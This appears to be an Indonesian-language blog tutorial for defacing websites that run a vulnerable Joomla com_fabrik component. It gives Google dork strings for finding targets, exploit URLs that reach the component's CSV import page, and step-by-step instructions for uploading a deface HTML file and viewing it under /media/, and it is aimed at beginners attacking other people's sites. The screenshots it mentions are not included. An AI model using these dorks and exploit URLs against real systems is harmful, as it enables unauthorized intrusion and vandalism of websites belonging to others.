Deface Metode Com_fabrik Import CSV - Hallo para junior juniorku yang ganteng dan cantik kali ini saya akan sharing lagi tutorial deface com_fabrik, tapi tutorial kali ini tidak upload shell yaa cuma upload script saja dan juga metode ini kalian harus manual tanpa memakai exploiter hehehe
Bahan :
1) Dork : - inurl:index.php?option=com_fabrik
- inurl:index.php/component/fabrik/
- inurl:index.php?option=com_fabrik&view=
- inurl:importcsv.php
- inurl:viewTable?cid=
- kembangin lagi gan agar dapet vuln banyak
2) Exploit :
- site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
- site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
3) Script deface
Tutorial :
1) Lakukan dorking terlebih dahulu
2) Pilih salah satu website tersebut dan masukan exploit diatas, jika website itu vuln tampilannya akan seperti ini
3) Jika sudah ketemu site vulnnya klik tombol "Pilih File / Browse" setelah itu cari script deface kalian dan tekan tombol "Import CSV", kalau berhasil tanda akan seperti ini (tidak di redirect kehalaman lain atau lainnya)
4) Cara melihat hasil deface kalian adalah site.com/media/namafile.html , dan kalau berhasil dilihat maka akan seperti ini
Gimana mudah gak cara ini, pastinya mudahlah orang yang memberikan tutorial sudah menjelaskan secara jelas + singkat + padat bagi kalian semua